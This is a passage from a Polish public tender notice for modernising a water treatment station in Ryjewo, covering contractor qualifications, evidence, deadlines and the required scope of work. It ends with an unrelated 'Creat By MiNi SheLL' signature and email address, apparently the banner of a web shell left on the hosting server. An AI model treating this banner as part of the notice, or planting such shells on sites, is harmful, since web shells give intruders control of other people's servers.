wykonania zamówienia:<br/>a)	Wykonawca prac spawalniczych musi zatrudniać spawaczy i operatorów urządzeń spawalniczych posiadających aktualne uprawnienia;<br/>b)	Wykonawca musi dysponować kierownikiem robót sanitarnych.<br/>3.	Serwis gwarancyjny i pogwarancyjny.<br/>•	Oferent musi posiadać autoryzowany profesjonalny i posiadający stosowne uprawnienia serwis gwarancyjny i pogwarancyjny dla stacji uzdatniania wody. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wiedza i doświadczenie<br/>•	wykaz robót budowlanych/wykonanych urządzeń w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania. Do wykazu należy dołączyć dokumenty potwierdzające, że wskazane w wykazie roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone oraz protokoły odbioru robót (ewentualnie). Dokumenty muszą potwierdzać, że zrealizowane roboty budowlane/wykonane urządzenia działają prawidłowo i bez zastrzeżeń Zamawiającego/Użytkownika co do ich eksploatacji.<br/>•	Zamawiający zastrzega sobie możliwość weryfikacji referencji bezpośrednio u inwestora/użytkownika obiektów referencyjnych.<br/><br/>2.	Osoby zdolne do wykonania zamówienia:<br/>•	w celu udokumentowania dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga wykazu następujących osób skierowanych przez wykonawcę do realizacji zamówienia publicznego (wraz z informacją o podstawie do dysponowania tymi osobami): <br/>- kierownik robót sanitarnych – winien spełniać następujące wymagania: co najmniej 5 lat doświadczenia zawodowego, liczonego od momentu uzyskania uprawnień budowlanych na stanowisku Kierownika Budowy lub Kierownika Robót, w tym co najmniej dwóch zakończonych inwestycji polegających na budowie/przebudowie/modernizacji stacji uzdatniania wody nie mniejszej niż 35 m3/h. Kierownik robót sanitarnych musi posiadać uprawnienia do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.<br/>- min 2 osób wykonujących prace spawalnicze: spawaczy i operatorów urządzeń spawalniczych posiadających aktualne uprawnienia- wraz z kopią uprawnień.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków<br/>udziału w postępowaniu. Niniejsze oświadczenie stanowi dowód potwierdzający brak podstaw do<br/>wykluczenia i spełnienie warunków udziału w postępowaniu na dzień składania ofert. Wzór<br/>oświadczenia stanowi Załącznik nr 6 do OPiW</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> brak <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-30 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ryjewo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-30 12:05</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Cena <h3 class="mb-0">8.8.) Krótki opis minimalnych wymagań dotyczących przedmiotu zamówienia lub realizacji zamówienia, niepodlegających negocjacjom, które muszą spełnić wszystkie oferty: </h3> •	Wymiana wszystkich filtrów ciśnieniowych wraz ze złożami oraz całego orurowania,<br/>•	Usprawnienie systemu aeracji powietrza, poprzez zastąpienie kolumny Risler’a na układ napowietrzania dynamicznego, <br/>•	Montaż sterylizatora UV, <br/>•	Wymiana układów sterowania na możliwość zdalnego powiadamiania oraz sterowania pracą stacji,<br/>•	Modernizacji budynku wewnątrz,<br/>•	Wymiany wyposażenie,<br/>•	Naprawy części murka ogniowego, od strony szczytu,<br/>•	Remont część socjalnej wraz z halą filtrów,<br/>•	Wydzielenie pomieszczenia na urządzenie do chlorowania wody,<br/>•	Wymianę całości instalacji elektrycznej ogólnej budynku, <br/>•	Montaż rozdzielni głównej, <br/>•	Montaż rozdzielni technologicznej, <br/>•	Montaż rozdzielni zestawu pompowego, <br/>•	Montaż przetworników i sond oraz automatyczne sterowanie całością procesu technologicznego z wykorzystaniem sterowników programowalnych, panelu graficznego, synoptycznego na elewacji rozdzielni głównej.

Creat By MiNi SheLL
Email: jattceo@gmail.com